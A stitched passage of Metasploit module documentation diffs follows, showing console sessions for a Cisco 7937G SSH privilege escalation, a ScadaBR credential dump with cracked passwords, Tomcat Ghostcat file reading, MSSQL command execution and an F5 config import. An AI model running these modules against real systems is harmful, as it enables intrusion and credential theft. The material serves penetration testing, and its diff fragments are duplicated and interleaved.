msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
user => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
pass => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
rhosts => 192.168.110.209
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### Cisco 7937G Running Firmware Version SCCP-1-4-5-5
#### Successful Scenario
```
msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
user => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
pass => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
rhosts => 192.168.110.209
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[*] 192.168.110.209 - SSH attack finished!
[*] 192.168.110.209 - Try to login using the supplied credentials test:test
[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
test@192.168.110.209's password:
$>help
Commands 1 to 21:
help - Shows basic help for all commands.
echo - Echoes all arguments (arbitrary parameters, up to 9)
psosMaxShow - Show max number of psos objects created.
psosFailuresShow - Show failures of psos api calls.
clearNetStats - Clear statistics counters in Ethernet Driver.
nicheShow - Show statistics of InterNiche stack.
psosIntStackShow - Show information on interrupt stack.
i - Display status of the specified process, or all running processes (Process_name (optional))
checkStack - Checks the stack.
reboot - Reboots the phone with an optional parameter.
logl - Set the lowest log level which will be displayed (0-6)
logs - Set the log level output for a given module ([module] [0-6])
logsa - Set the log level output for all modules. ([0-6])
logt - Set the log display type (0-2)
logd - Dump the log, parameter is reverse order or not.
logda - Print all available log modules and their current level.
setRtRender - Set real time rendering parameters for the log.
lfu - Send the logfiles to the provisioning server(no parameters).
del - Delete specified file.
cat - Concatanate specified files.
Commands 21 to 41:
copy - Copy a file, can be stdout.
ls - List the contents of flash.
ll - List the contents of flash.
d - Display memory. <address>,<num words>,<size words>
m - Display memory. <address>,<size words>
ping - Ping a given host (IP or DNS name) [,Data Len in Bytes]
ifShow - Display ethernet interface statistics (no parameters)
showStoredConfig - Display configuration as stored in flash (no parameters)
showRunningConfig - Display the current running configuration (no parameters)
showBackupConfig - Display backup configuration as stored in flash (no parameters)
overrideBackupConfig - Override backup flash config with current config (no parameters)
overrideSecurityBackup - Override backup security sector with current security sector.
resetConfig - Reset the phone to the default settings(setting type [SPIP],[SPIPCS],[SPIPShoreline])
configDhcpSet - Set DHCP parameters in the flash.
(DHCP Enabled[YES|NO], Offer Timeout, DHCP Option, DHCP Option Type,
Using statically configured boot server[YES|NO])
configDnsSet - Set DNS parameters in the flash. (Primary DNS Server, Secondary DNS Server, DNS Domain)
configNetSet - Set network parameters in the flash.
(IP Address, Subnet Mask, Router, VLAN(can be empty))
configProvisioningSet - Set provisioning server parameters in the flash.
(Server Name, Using server type[FTP|TFTP|HTTP|HTTPS|FTPS], User, Password)
configSntpSet - Set SNTP parameters in the flash. (sntpserverName,sntpgmtOffset)
nslookup - Find the IP for a given hostname
dnsCacheAShow - Show DNS Cache for A records.
Commands 41 to 61:
dnsCacheSrvShow - Show DNS Cache for SRV records.
dnsCacheAFlush - Flush DNS A records from cache.
version - Display vxWorks bootline, software versions, and hardware version.
hwBoardSerialSet - Set serial number. !!!!!Should never be used!!!!!.
hwVarSet - Set the contents of a hardware var ([var ID] [new value])
hwVarShow - Display the contents of a hardware var ([var ID])
simulateKeyPress - Send a key Press event to so like it came from hardware.
simulateKeyHold - Send a key Hold event to so like it came from hardware.
simulateKeyRelease - Send a key Release event to so like it came from hardware.
simulateHookUp - Send a hookswitch event to so like it came from hardware.
simulateHookDown - Send a hookswitch event to so like it came from hardware.
ncasMisc - Show misc. non-call information (no parameters)
ncasCb - Show detailed ncas information, related to either call services,
non-call services, or server information (1, 2, or 3)
uptime - Show phone uptime.
appPrt - Show UI's call status.
fntPrt - Show information about fonts available on phone.
memtop - Shows the top poiter to current memory.
removeScheduledLogEntry - debug
addScheduledLogEntry - debug
fatalError - Simulate fatal error for the phone.
Commands 61 to 81:
enableStrTruncLog - Enable logging of string truncation.
disableStrTruncLog - Disable logging of string truncation.
sendFlashBinImage - Upload binary flash image.
setMac - debug, here because PSOS can't set the MAC.
sg - send a bitmap to the boot server
memShow - Display system memory usage
memDebug - Toggle memory manager trace flag
l2Debug - Toggle memory manager trace flag
wsTest - Web Service Test Tool
fxShow - Display file transfer manager status
utilHostByNameShow - Test utilHostByName
utilDnsShow - Show callbacks for dns queries
dnsCacheShow - Show DNSACacheShow
utilEthLinkShow - Show Ethernet link status
ethConfigTest - Set Ethernet Mode (0 to 4)
timeTest - Test time
contrastChg - Change LCD Contrast
setAdminVlan - Set admin vlan id
setL2Auth - Set L2 Auth Enable/Disable
ipAddrChange - Change ip addr configuration
Commands 81 to 101:
tftpChange - Change tftp addr
arpStats - Print ARP statistics
fxPut - Transfer file to remote
crash - Crash the system
ipAddrShow - Show ip addr
rtosSocketShow - Show rtos socket information
sccpShow - Show protocol
regManagerShow - show registration manager state
uiPrintAll - uiPrintAll
uiPrintSoftKeys - uiPrintSoftKeys
getVoiceQuality - displays voice quality control status
uiPrintLocalSoftKeys - uiPrintLocalSoftKeys
uiStartTone - uiStartTone
uiStopTone - uiStopTone
pegPrintAll - pegPrintAll
uiSMPrintAll - uiStateMachinePrintAll
lldpSMPrintAll - lldpStateMachinePrintAll
saveLogLevels - saveLogLevels
localePrintAll - localePrintAll
ceShow - Show Client Engine Status
Commands 101 to 121:
udiShow - Show Unique Device Indentifier
show - Show Unique Device Indentifier
pbnShow - Display app & bootrom headers
upr - Upgrade to a Rockpile Standalone Image
upm - Upgrade to a Rockpile Manf Image
setHw - Sets the Rockpile Hardware Id
getHw - Prints the Rockpile Hardware Id
setUpf - Sets the Upgrade progress flag
rstUpf - Resets the Upgrade progress flag
setMdm - Sets the Manf diag mode flag
rstMdm - Resets the Manf diag mode flag
setDhcp - Sets the Manf diag dhcp flag
rstDhcp - Resets the Manf diag dhcp flag
setOrd - Sets the ORD flag
rstOrd - Resets the ORD flag
fs - Prin the status of rockpile flags
cp - Mfg. test diags
vol - Mfg. test diags
sig - Mfg. test diags
os - Mfg. test diags
Commands 121 to 141:
lcd - Mfg. test diags
sum - Prints checksums of flash images
rd - Mfg. test diags
wr - Mfg. test diags
eth - Start/stop ethernet hardware
fstp - Stop FGPIO interface
hfTxEq - Audio testing for large conf rooms
ctConv - perform ct convergence test.
ctModeEnd - terminate ctMode
ctEnableRx - Enable ctRx 1 on, 0 off
ctEnableTx - Enable ctTx 1 on, 0 off
ctMicTx - Route mic # to Tx
ctEMTx - Route external mic # to Tx
ctSineTx - [chan], [freq], [dBm]: Generate tone to Tx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
ctRxSpkr - Send directly to HF speaker
ctSineSpkr - [chan], [freq], [dBm]: Generate tone to Rx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
ctNoiseSpkr - [chan], [dBm]: Generate noise to Rx (0 => HD, 1 => HF, default HF, -40dBm)
displayListeningPorts - Display listening port and process info
killListeningProcess - Kill the task associated with the port
$>exit
```
#### Unsuccessful Scenario
```
msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
user => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
pass => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
rhosts => 192.168.110.209
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -1,63 +1,108 @@
## Description
This module retrieves credentials from ScadaBR, including service credentials and unsalted SHA1 password hashes for all users, by invoking the `EmportDwr.createExportData` DWR method of Mango M2M which is exposed to all authenticated users regardless of privilege level.
## Vulnerable Application
ScadaBR is a SCADA (Supervisory Control and Data Acquisition) system with applications in Process Control and Automation, being developed and distributed using the open source model.
This module retrieves credentials from ScadaBR, including
service credentials and unsalted SHA1 password hashes for
all users, by invoking the `EmportDwr.createExportData` DWR
method of Mango M2M which is exposed to all authenticated
users regardless of privilege level.
This module has been tested successfully with ScadaBR versions 1.0 CE and 0.9 on Windows and Ubuntu systems.
Installers:
* [Windows Installers](https://sourceforge.net/projects/scadabr/files/Software/Installer%20Win32/)
* [Linux Installers](https://sourceforge.net/projects/scadabr/files/Software/Linux/)
* [Tomcat WAR files](https://sourceforge.net/projects/scadabr/files/Software/WAR/)
ScadaBR is a SCADA (Supervisory Control and Data Acquisition)
system with applications in Process Control and Automation,
being developed and distributed using the open source model.
This module has been tested successfully with ScadaBR
versions 1.0 CE and 0.9 on Windows and Ubuntu systems.
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/admin/http/scadabr_credential_dump`
3. Do: `set rhost [IP]`
4. Do: `set username [USERNAME]`
5. Do: `set password [PASSWORD]`
6. Do: `run`
7. You should get credentials
Download:
* [Windows Installers](https://sourceforge.net/projects/scadabr/files/Software/Installer%20Win32/)
* [Linux Installers](https://sourceforge.net/projects/scadabr/files/Software/Linux/)
* [Tomcat WAR files](https://sourceforge.net/projects/scadabr/files/Software/WAR/)
Metasploit:
1. Start `msfconsole`
1. Do: `use auxiliary/admin/http/scadabr_credential_dump`
1. Do: `set rhosts [IP]`
1. Do: `set username [USERNAME]`
1. Do: `set password [PASSWORD]`
1. Do: `run`
1. You should get credentials
## Options
### USERNAME
The username for the application (default: `admin`)
### PASSWORD
The password for the application (default: `admin`)
### PASS_FILE
Wordlist file to crack password hashes (default: `./data/unix_passwords.txt`)
## Scenarios
```
[+] 172.16.191.166:8080 Authenticated successfully as 'admin'
[+] 172.16.191.166:8080 Export successful (4436 bytes)
[+] Found 5 users
[*] Found weak credentials (admin:admin)
[*] Found weak credentials (user:password)
[*] Found weak credentials (zxcv:zxcv)
```
msf6 > use auxiliary/admin/http/scadabr_credential_dump
msf6 auxiliary(admin/http/scadabr_credential_dump) > set rhosts 172.16.191.194
rhosts => 172.16.191.194
msf6 auxiliary(admin/http/scadabr_credential_dump) > set username admin
username => admin
msf6 auxiliary(admin/http/scadabr_credential_dump) > set password admin
password => admin
msf6 auxiliary(admin/http/scadabr_credential_dump) > run
[*] Running module against 172.16.191.194
ScadaBR User Credentials
========================
[+] 172.16.191.194:8080 Authenticated successfully as 'admin'
[+] 172.16.191.194:8080 Export successful (4735 bytes)
[+] Config saved in: /root/.msf4/loot/20210220192214_default_172.16.191.194_scadabr.config_546879.txt
[+] Found 5 users
[*] Found weak credentials (admin:admin)
[*] Found weak credentials (operator:a)
[*] Found weak credentials (test:sunshine)
[*] Found weak credentials (user:A)
[*] Found weak credentials (zxcv:zxcv)
Username Password Hash (SHA1) Admin E-mail
-------- -------- ----------- ----- ------
admin admin d033e22ae348aeb5660fc2140aec35850c4da997 true admin@yourMangoDomain.com
operator ef0cade28a5696433326749bb57c39104ca33550 false operator@localhost
test 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 false test@localhost
user password 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 true user@localhost
zxcv zxcv 9878e362285eb314cfdbaa8ee8c300c285856810 false zxcv@localhost
ScadaBR User Credentials
========================
Username Password Hash (SHA1) Role E-mail
-------- -------- ----------- ---- ------
admin admin d033e22ae348aeb5660fc2140aec35850c4da997 Admin admin@yourMangoDomain.com
operator a 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 User operator@localhost
test sunshine 8d6e34f987851aa599257d3831a1af040886842f User test@localhost
user A 6dcd4ce23d88e2ee9568ba546c007c63d9131c1b Admin user@localhost
zxcv zxcv 9878e362285eb314cfdbaa8ee8c300c285856810 User zxcv@localhost
ScadaBR Service Credentials
===========================
[+] Found SMTP credentials: smtptestuser:smtptestpass@127.0.0.1:25
[+] Found HTTP proxy credentials: proxytestuser:proxytestpass@127.0.0.1:8080
Service Host Port Username Password
------- ---- ---- -------- --------
HTTP proxy 127.0.0.1 8080 proxytestuser proxytestpass
SMTP 127.0.0.1 25 smtptestuser smtptestpass
ScadaBR Service Credentials
===========================
[+] Config saved in: /root/.msf4/loot/20170527210941_default_172.16.191.166_scadabr.config_861842.txt
[*] Auxiliary module execution completed
```
Service Host Port Username Password
------- ---- ---- -------- --------
HTTP proxy 127.0.0.1 8080 proxytestuser proxytestpass
SMTP 127.0.0.1 25 smtptestuser smtptestpass
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/scadabr_credential_dump) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
172.16.191.194 172.16.191.194 8080/tcp (http) admin admin Password
172.16.191.194 172.16.191.194 8080/tcp (http) operator a Password
172.16.191.194 172.16.191.194 8080/tcp (http) test sunshine Password
172.16.191.194 172.16.191.194 8080/tcp (http) user A Password
172.16.191.194 172.16.191.194 8080/tcp (http) zxcv zxcv Password
msf6 auxiliary(admin/http/scadabr_credential_dump) >
```
@@ -0,0 +1,142 @@
## Vulnerable Application
### Description
This module can be used to retrieve arbitrary files from anywhere in the web application, including the `WEB-INF` and `META-INF`
directories and any other location that can be reached via ServletContext.getResourceAsStream() on Apache Tomcat servers.
It also allows the attacker to process any file in the web application as JSP.
### Setup
Running within a docker container:
```
docker run --name tomcat --rm -p 8080:8080 -p 8009:8009 tomcat:8.5.32
```
## Verification Steps
1. Install the application and start it
2. Start msfconsole
3. Do: `use auxiliary/admin/http/tomcat_ghostcat`
4. Do: `set RHOSTS [ip]`
5. Do: `set RPORT [port]`
6. Do: `set FILENAME [filename]`
7. Do: `run`
## Options
### FILENAME
The file you would like to retrieve from the target web application.
### AJP_PORT
The port on the target that is running the Apache JServ Protocol (AJP).
## Scenarios
### Apache Tomcat 8.5.32
```
msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(admin/http/tomcat_ghostcat) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(admin/http/tomcat_ghostcat) > set FILENAME /WEB-INF/web.xml
FILENAME => /WEB-INF/web.xml
msf6 auxiliary(admin/http/tomcat_ghostcat) > run
[*] Running module against 127.0.0.1
Status Code: 200
Accept-Ranges: bytes
ETag: W/"1227-1529524397000"
Last-Modified: Wed, 20 Jun 2018 19:53:17 GMT
Content-Type: application/xml
Content-Length: 1227
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
version="3.1"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to Tomcat
</description>
</web-app>
[+] 127.0.0.1:8080 - /Users/user/.msf4/loot/20210408102538_default_127.0.0.1_WEBINFweb.xml_436040.txt
[*] Auxiliary module execution completed
```
### Apache Tomcat on Windows 10.0.16299.125
```
[*] Processing tomcat_ghostcat.rb for ERB directives.
resource (tomcat_ghostcat.rb)> use auxiliary/admin/http/tomcat_ghostcat
resource (tomcat_ghostcat.rb)> set rport 8080
rport => 8080
resource (tomcat_ghostcat.rb)> set rhosts 127.0.0.1
rhosts => 127.0.0.1
resource (tomcat_ghostcat.rb)> set verbose true
verbose => true
resource (tomcat_ghostcat.rb)> set FILENAME /WEB-INF/web.xml
filename => /WEB-INF/web.xml
resource (tomcat_ghostcat.rb)> run
[*] Running module against 127.0.0.1
<?xml version="1.0" encoding="UTF-8"?>
<!--
Copyright 2017 The MIT Internet Trust Consortium
Portions copyright 2011-2013 The MITRE Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd">
version = "4.0"
metadata-complete="true">
<display-name> Welcome to Tomcat </display-name>
<description>
Welcome to Tomcat
</description>
<web-app>
[*] Auxiliary module execution completed
```
@@ -1,6 +1,6 @@
## Description
This module exploits the [Wordpress GDPR compliance plugin](https://wordpress.org/plugins/wp-gdpr-compliance/) lack of validation ([WPVDB 9144](https://wpvulndb.com/vulnerabilities/9144)), which affects versions 1.4.2 and lower.
This module exploits the [Wordpress GDPR compliance plugin](https://wordpress.org/plugins/wp-gdpr-compliance/) lack of validation ([WPVDB 9144](https://wpscan.com/vulnerability/9144)), which affects versions 1.4.2 and lower.
When a user triggers GDPR-related actions, Wordpress's `admin-ajax.php` is called but fails to do validation and capacity checks regarding the asked actions. This leads to any unauthenticated user being able to modify any arbitrary settings on the targeted server.
@@ -0,0 +1,55 @@
## Description
This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the sp_oacreate
procedure (more opsec safe, no output, no temporary data table). A valid username and password is required to use this
module. The sp_oacreate function is used in metasploit to rebuild the xp_cmdshell stored procedure but can be used
directly to get code execution which is the more opsec safe way.
## Options
### TECHNIQUE
Technique to use for command execution.
When `xp_cmdshell` is selected, the corresponding stored procedure is used. The [`xp_cmdshell`][1] stored procedure is
disabled by default, but Metasploit will attempt to enable it which requires elevated privileges. This technique returns
the output when the command was successfully run. If this technique fails, the module will attempt to use the
`sp_oacreate` technique instead.
When `sp_oacreate` is selected, a more stealthy technique will be used however no command output will be available. This
technique leverages the [`sp_OACreate`][2] stored procedure to create an instance of an OLE object and invokes
`wscript.shell`.
## Verification Steps
1. Do: `use use admin/mssql/mssql_exec`
2. Do: `set USERNAME [username1]`
3. Do: `set PASSWORD [password1]`
3. Do: `set TECHNIQUE sp_oacreate` (optional, defaults to xp_cmdshell)
4. Do: `set RHOSTS [IP]`
5. Do: `set CMD [command]`
6. Do: `run`
## Scenarios
```
msf > use use use admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > set USERNAME username1
USERNAME => username1
msf auxiliary(mssql_exec) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_exec) > set TECHNIQUE sp_oacreate
TECHNIQUE => sp_oacreate
msf auxiliary(mssql_exec) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_exec) > set CMD cmd.exe /c echo OWNED > C:\owned.txt
CMD => cmd.exe /c echo OWNED > C:\owned.txt
msf auxiliary(mssql_exec) > run
[*] 192.168.1.195:1433 - Enabling advanced options and ole automation procedures.
[*] 192.168.1.195:1433 - Executing command using sp_oacreate. No output will be displayed.
[*] Auxiliary module execution completed
msf auxiliary(mssql_exec_oacreate) >
```
[1]: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15
[2]: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql?view=sql-server-ver15
@@ -0,0 +1,525 @@
## Vulnerable Application
### General Notes
This module imports an F5 configuration file into the database.
This is similar to `post/networking/gather/enum_f5` only access isn't required,
and assumes you already have the file.
### Example Config
```
#TMSH-VERSION: 15.1.0.2
cm cert /Common/dtca-bundle.crt {
cache-path /config/filestore/files_d/Common_d/trust_certificate_d/:Common:dtca-bundle.crt_62970_3
checksum SHA1:1310:d1e052507e0ec1a274848374ff904ae8548d7dd2
revision 3
}
cm cert /Common/dtca.crt {
cache-path /config/filestore/files_d/Common_d/trust_certificate_d/:Common:dtca.crt_62966_3
checksum SHA1:1310:d1e052507e0ec1a274848374ff904ae8548d7dd2
revision 3
}
cm cert /Common/dtdi.crt {
cache-path /config/filestore/files_d/Common_d/trust_certificate_d/:Common:dtdi.crt_62962_3
checksum SHA1:1285:0f4ddae3808474c70911f43725c7cfdb46aa4430
revision 3
}
cm device /Common/f5bigip.home.com {
active-modules { "BIG-IP, VE Trial|VTFLRXF-LFSIQYY|Rate Shaping|External Interface and Network HSM, VE|SDN Services, VE|SSL, Forward Proxy, VE|BIG-IP VE, Multicast Routing|APM, Limited|SSL, VE|DNS (1K QPS), VE|Routing Bundle, VE|ASM, VE|Crytpo Offload, VE, Tier 1 (25M - 200M)|Max Compression, VE|AFM, VE|DNSSEC|Anti-Virus Checks|Base Endpoint Security Checks|Firewall Checks|Network Access|Secure Virtual Keyboard|APM, Web Application|Machine Certificate Checks|Protected Workspace|Remote Desktop|App Tunnel|VE, Carrier Grade NAT (AFM ONLY)|PSM, VE" }
base-mac aa:aa:aa:aa:aa:aa
build 0.0.9
cert /Common/dtdi.crt
chassis-id 564dcf79-53ce-3494-3217671849c7
configsync-ip 10.10.10.222
edition "Point Release 2"
hostname f5bigip.home.com
key /Common/dtdi.key
management-ip 2.2.2.2
marketing-name "BIG-IP Virtual Edition"
platform-id Z100
product BIG-IP
self-device true
time-zone America/Los_Angeles
version 15.1.0.2
}
cm device-group /Common/device_trust_group {
auto-sync enabled
devices {
/Common/f5bigip.home.com { }
}
hidden true
network-failover disabled
}
cm device-group /Common/gtm {
devices {
/Common/f5bigip.home.com { }
}
hidden true
network-failover disabled
}
cm key /Common/dtca.key {
cache-path /config/filestore/files_d/Common_d/trust_certificate_key_d/:Common:dtca.key_62968_3
checksum SHA1:1704:f274958ad619b0c70d8ccc4f7c5ae199061464e6
revision 3
}
cm key /Common/dtdi.key {
cache-path /config/filestore/files_d/Common_d/trust_certificate_key_d/:Common:dtdi.key_62964_3
checksum SHA1:1704:97eeb5aedee76b3c21e6d735604a092e830ef6c2
revision 3
}
cm traffic-group /Common/traffic-group-1 {
unit-id 1
}
cm traffic-group /Common/traffic-group-local-only { }
cm trust-domain /Common/Root {
ca-cert /Common/dtca.crt
ca-cert-bundle /Common/dtca-bundle.crt
ca-devices { /Common/f5bigip.home.com }
ca-key /Common/dtca.key
guid fe0ee274-0355-4940-acc7000c291849c7
status standalone
trust-group /Common/device_trust_group
}
net interface 1.1 {
media-fixed 10000T-FD
}
net interface 1.2 {
media-fixed 10000T-FD
}
net interface 1.3 {
media-fixed 10000T-FD
}
net port-list /Common/_sys_self_allow_tcp_defaults {
ports {
22 { }
53 { }
161 { }
443 { }
1029-1043 { }
4353 { }
}
}
net port-list /Common/_sys_self_allow_udp_defaults {
ports {
53 { }
161 { }
520 { }
1026 { }
4353 { }
}
}
net route-domain /Common/0 {
id 0
vlans {
/Common/http-tunnel
/Common/socks-tunnel
/Common/internal
}
}
net self /Common/10.10.10.223 {
address 10.10.10.223/8
allow-service {
default
}
traffic-group /Common/traffic-group-1
vlan /Common/internal
}
net self /Common/10.10.10.222 {
address 10.10.10.222/8
allow-service {
default
}
traffic-group /Common/traffic-group-local-only
vlan /Common/internal
}
net self-allow {
defaults {
igmp:0
ospf:0
pim:0
tcp:161
tcp:22
tcp:4353
tcp:443
tcp:53
udp:1026
udp:161
udp:4353
udp:520
udp:53
}
}
net stp /Common/cist { }
net vlan /Common/internal {
tag 4094
}
net fdb tunnel /Common/http-tunnel { }
net fdb tunnel /Common/socks-tunnel { }
net fdb vlan /Common/internal { }
net tunnels tunnel /Common/http-tunnel {
description "Tunnel for http-explicit profile"
profile /Common/tcp-forward
}
net tunnels tunnel /Common/socks-tunnel {
description "Tunnel for socks profile"
profile /Common/tcp-forward
}
security device-id attribute /Common/att01 {
id 1
}
security device-id attribute /Common/att02 {
id 2
}
security device-id attribute /Common/att03 {
id 3
}
security device-id attribute /Common/att04 {
id 4
}
security device-id attribute /Common/att05 {
id 5
}
security device-id attribute /Common/att06 {
id 6
}
security device-id attribute /Common/att07 {
id 7
}
security device-id attribute /Common/att08 {
id 8
}
security device-id attribute /Common/att09 {
id 9
}
security device-id attribute /Common/att10 {
id 10
}
security device-id attribute /Common/att11 {
id 11
}
security device-id attribute /Common/att12 {
id 12
}
security device-id attribute /Common/att13 {
id 13
}
security device-id attribute /Common/att14 {
id 14
}
security device-id attribute /Common/att15 {
id 15
}
security device-id attribute /Common/att16 {
id 16
}
security device-id attribute /Common/att17 {
id 17
}
security device-id attribute /Common/att18 {
id 18
}
security device-id attribute /Common/att19 {
id 19
}
security device-id attribute /Common/att20 {
id 20
}
security device-id attribute /Common/att21 {
id 21
}
security device-id attribute /Common/att22 {
id 22
}
security device-id attribute /Common/att23 {
id 23
}
security device-id attribute /Common/att24 {
id 24
}
security device-id attribute /Common/att25 {
id 25
}
security device-id attribute /Common/att26 {
id 26
}
security device-id attribute /Common/att27 {
id 27
}
security device-id attribute /Common/att28 {
id 28
}
security device-id attribute /Common/att29 {
id 29
}
security device-id attribute /Common/att30 {
id 30
}
security device-id attribute /Common/att31 {
id 31
}
security device-id attribute /Common/att32 {
id 32
}
security device-id attribute /Common/att33 {
id 33
}
security device-id attribute /Common/att34 {
id 34
}
security device-id attribute /Common/att35 {
id 35
}
security device-id attribute /Common/att36 {
id 36
}
security device-id attribute /Common/att37 {
id 37
}
security device-id attribute /Common/att38 {
id 38
}
security device-id attribute /Common/att39 {
id 39
}
security firewall config-entity-id /Common/uuid_entity_id {
entity-id 3346813779321352940
}
security firewall port-list /Common/_sys_self_allow_tcp_defaults {
ports {
22 { }
53 { }
161 { }
443 { }
1029-1043 { }
4353 { }
}
}
security firewall port-list /Common/_sys_self_allow_udp_defaults {
ports {
53 { }
161 { }
520 { }
1026 { }
4353 { }
}
}
security firewall rule-list /Common/_sys_self_allow_all {
rules {
_sys_allow_all {
action accept
ip-protocol any
}
}
}
security firewall rule-list /Common/_sys_self_allow_defaults {
rules {
_sys_allow_tcp_defaults {
action accept
ip-protocol tcp
destination {
port-lists {
/Common/_sys_self_allow_tcp_defaults
}
}
}
_sys_allow_udp_defaults {
action accept
ip-protocol udp
destination {
port-lists {
/Common/_sys_self_allow_udp_defaults
}
}
}
_sys_allow_ospf_defaults {
action accept
ip-protocol ospf
}
_sys_allow_pim_defaults {
action accept
ip-protocol pim
}
_sys_allow_igmp_defaults {
action accept
ip-protocol igmp
}
}
}
security firewall rule-list /Common/_sys_self_allow_management {
rules {
_sys_allow_ssh {
action accept
ip-protocol tcp
destination {
ports {
22 { }
}
}
}
_sys_allow_web {
action accept
ip-protocol tcp
destination {
ports {
443 { }
}
}
}
}
}
security ip-intelligence policy /Common/ip-intelligence { }
security shared-objects port-list /Common/_sys_self_allow_tcp_defaults {
ports {
22 { }
53 { }
161 { }
443 { }
1029-1043 { }
4353 { }
}
}
security shared-objects port-list /Common/_sys_self_allow_udp_defaults {
ports {
53 { }
161 { }
520 { }
1026 { }
4353 { }
}
}
sys dns {
description configured-by-dhcp
name-servers { 192.168.2.40 9.9.9.9 }
search { ragedomain }
}
sys folder / {
device-group none
hidden false
inherited-devicegroup false
inherited-traffic-group false
traffic-group /Common/traffic-group-1
}
sys folder /Common {
device-group none
hidden false
inherited-devicegroup true
inherited-traffic-group true
traffic-group /Common/traffic-group-1
}
sys folder /Common/Drafts {
device-group none
hidden false
inherited-devicegroup true
inherited-traffic-group true
traffic-group /Common/traffic-group-1
}
sys global-settings {
hostname f5bigip.home.com
}
sys management-dhcp /Common/sys-mgmt-dhcp-config {
request-options { subnet-mask broadcast-address routers domain-name domain-name-servers host-name ntp-servers interface-mtu }
}
sys provision ltm {
level nominal
}
sys snmp {
agent-addresses { tcp6:161 udp6:161 }
communities {
/Common/comm-public {
community-name public
source default
}
}
disk-monitors {
/Common/root {
minspace 2000
path /
}
/Common/var {
minspace 10000
path /var
}
}
process-monitors {
/Common/bigd {
max-processes infinity
process bigd
}
/Common/chmand {
process chmand
}
/Common/httpd {
max-processes infinity
process httpd
}
/Common/mcpd {
process mcpd
}
/Common/sod {
process sod
}
/Common/tmm {
max-processes infinity
process tmm
}
}
}
sys dynad settings {
development-mode false
}
sys fpga firmware-config {
type standard-balanced-fpga
}
sys sflow global-settings http { }
sys sflow global-settings vlan { }
sys turboflex profile-config {
type turboflex-adc
}
```
## Verification Steps
1. Have an F5 configuration file
